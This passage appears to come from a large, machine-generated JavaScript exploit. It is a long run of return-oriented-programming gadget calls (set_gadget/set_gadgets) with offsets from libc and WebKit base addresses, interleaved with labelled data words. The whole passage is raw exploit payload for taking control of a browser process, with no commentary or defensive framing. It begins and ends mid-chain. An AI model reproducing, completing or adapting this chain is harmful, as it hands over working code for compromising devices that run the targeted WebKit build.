]); //L6410: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6411: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6412: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+323144, //L6413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6413: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6415: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+323264, //L6418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+323248, //L6416 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6416: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6418: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+323408, //L6421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+323376, //L6419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+323392, //L6420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6419: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6420: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6421: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+323496, //L6423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6422: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6423: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+323552, //L6424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6424: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6426: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+323632, //L6428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6428: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+323744, //L6429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6429: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6431: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+323864, //L6434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+323848, //L6432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+324008, //L6437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+323976, //L6435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+323992, //L6436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6435: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6436: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+324088, //L6438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6438: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6440: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+324208, //L6443 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+324192, //L6441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6441: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6443: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+324288, //L6444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+324304, //L6445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6445: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+324464, //L6449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+324432, //L6447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+324448, //L6448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6446: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6448: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6449: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+324520, //L6451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6451: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+324648, //L6453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+324664, //L6454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+324632, //L6452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6452: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6453: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6454: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+324824, //L6458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+324792, //L6456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+324808, //L6457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6455: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6456: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6457: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6458: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+324880, //L6460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6460: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+325008, //L6462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+325024, //L6463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+324992, //L6461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6461: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6462: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6463: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+325184, //L6467 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+325152, //L6465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+325168, //L6466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6464: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6465: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6466: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6467: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+325240, //L6469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6469: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+325368, //L6471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+325384, //L6472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+325352, //L6470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6470: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6471: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6472: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+325464, //L6473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+325480, //L6474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6474: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+325576, //L6476 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+325560, //L6475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6476: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+325656, //L6477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6479: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+325776, //L6482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+325760, //L6480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6480: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+325856, //L6484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+325888, //L6486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6484: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L6485: ropchain+326016, //L6483 libc_base+144605 //pop rdi ]); //L6486: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+325992, //L6488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+326008, //L6487 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+759608 //pop rax ]); //L6488: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L6487: db([0, 0]); // 0x0 //L6483: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+326088, //L6489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6489: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6491: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+326208, //L6494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+326192, //L6492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6492: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+326352, //L6497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+326320, //L6495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+326336, //L6496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6495: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6496: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6497: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+326440, //L6499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6498: db([1, 0]); // 0x1 
set_gadget(libc_base+759608,); //pop rax //L6499: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+326496, //L6500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6500: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6502: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+326576, //L6504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6504: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+318872, //L6308 libc_base+782311, //pop rsp ropchain+327216, //L6505 //L6398: libc_base+764760, //pop rsi ropchain+326688, //L6506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6506: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6508: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+326808, //L6511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+326792, //L6509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6509: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6511: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+326952, //L6514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+326920, //L6512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+326936, //L6513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6512: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6513: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6514: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+327040, //L6516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6515: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6516: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+327096, //L6517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6519: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+327176, //L6521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L6505: libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+327272, //L6523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6522: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6524: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+327352, //L6525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, 
//mov rax, r8 libc_base+763368 //pop rcx ]); //L6525: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6527: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+327432, //L6529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6529: db([0, 0]); // 0x0 //L6528: set_gadgets([ libc_base+764760, //pop rsi ropchain+327480, //L6531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6531: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6533: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+327600, //L6536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+327584, //L6534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6534: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6536: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+327680, //L6537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+327696, //L6538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6537: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6538: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+327856, //L6542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+327824, //L6540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+327840, //L6541 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+763368 //pop rcx ]); //L6539: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6541: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6542: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+327912, //L6544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6544: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+328040, //L6546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+328056, //L6547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+328024, //L6545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6545: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6546: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6547: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+328216, //L6551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+328184, //L6549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+328200, //L6550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6548: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6549: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6550: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6551: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+328272, //L6553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6553: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+328400, //L6555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+328416, //L6556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+328384, //L6554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6554: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6555: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6556: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+328576, //L6560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+328544, //L6558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+328560, //L6559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6557: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6558: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6559: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6560: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+328632, //L6562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6562: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+328760, //L6564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+328776, //L6565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
//pop rsi ropchain+328744, //L6563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6563: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6564: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6565: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+328856, //L6566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+328872, //L6567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6566: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6567: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+328960, //L6568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+328976, //L6570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6568: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6570: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6571: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6573: db([4294967268, 4294967295]); // -0x1c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+329136, //L6576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+329120, //L6574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6574: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6576: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+329312, //L6579 
